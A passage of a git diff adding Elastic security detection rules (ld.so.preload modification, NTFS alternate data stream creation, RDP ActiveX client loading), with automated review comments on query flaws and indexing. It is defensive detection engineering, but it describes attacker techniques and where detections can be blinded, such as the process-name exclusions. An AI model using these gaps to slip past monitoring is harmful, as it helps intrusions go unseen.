guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1547",
+ "name": "Boot or Logon Autostart Execution",
+ "reference": "https://attack.mitre.org/techniques/T1547/",
+ "subtechnique": [
+ {
+ "id": "T1547.006",
+ "name": "Kernel Modules and Extensions",
+ "reference": "https://attack.mitre.org/techniques/T1547/006/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 106
+ },
+ "id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106",
+ "type": "security-rule"
+}
\ No newline at end of file
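Review bot: `index` is the catch-all `logs-endpoint.events.*` even though the query is pinned to `event.category:process`, so each run of this rule also searches the file, network, registry and other endpoint data streams for events it can never match. The `_108` revision of the WMI registry rule earlier in this diff narrows its pattern to `logs-endpoint.events.registry-*`; the corresponding `"logs-endpoint.events.process-*"` here would follow the same convention, assuming the package routes process events to that data stream in the same way it does registry events.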
diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json
new file mode 100644
index 00000000000..2e5184a49df
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json
@@ -0,0 +1,106 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries.",
+ "from": "now-9m",
+ "history_window_start": "now-10d",
+ "index": [
+ "auditbeat-*",
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Modification of Dynamic Linker Preload Shared Object",
+ "new_terms_fields": [
+ "host.id",
+ "user.id",
+ "process.executable"
+ ],
+ "query": "host.os.type:linux and event.category:file and event.action:(updated or renamed or rename or file_rename_event) and \nnot event.type:deletion and file.path:/etc/ld.so.preload and not process.name:(wine or oneagentinstallaction)\n",
+ "references": [
+ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f",
+ "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json new file mode 100644 index 00000000000..29409d531c0 --- /dev/null 
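Review bot: The exclusion `not process.name:(wine or oneagentinstallaction)` in this rule's query keys on process.name alone, and a process name is chosen by whoever runs the binary, so the exception can blind the rule for anything carrying one of those names; if the noise comes from a known installer, pinning the exception to `process.executable` (already one of the new_terms fields) would keep the exception narrow. Separately, the setup text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html` while every other helper-guide link in this hunk and in the preceding rule uses `current`, so the pinned 8.10 version looks accidental. Since these JSON files appear to be exported from the upstream rule set, both changes presumably belong in the source rule rather than this package copy.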
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program 
Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + 
}, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json new file mode 100644 index 00000000000..f26bbf22385 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json 
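Review bot: The process.executable exclusion `"?:\\Program Files(x86)\\Microsoft Office\\root\\*\\EXCEL.EXE"` in the query is missing the space before `(x86)`, so it never matches the real 32-bit Office path and that entry is dead while the neighbouring OUTLOOK, POWERPNT and WINWORD entries spell `Program Files (x86)` correctly; the same entry is repeated unchanged in the _114 hunk below, which only narrows the index pattern. The file.extension list also lists `"png"` twice (once after `"dll"` and again after `"jpg"`), and one copy can be dropped. The last investigation step in the note says "after the registry modification" although this rule fires on file creation, so `after the file creation` would read correctly. As the rule files appear to be exported from upstream, the fix presumably belongs in the source rule rather than this package copy.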
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program 
Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + 
}, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 114 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_114", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json new file mode 100644 index 00000000000..d240a5d8ca0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_108.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious RDP ActiveX Client Loaded", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable : (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vmconnect.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsSandboxClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\hvsirdpclient.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + 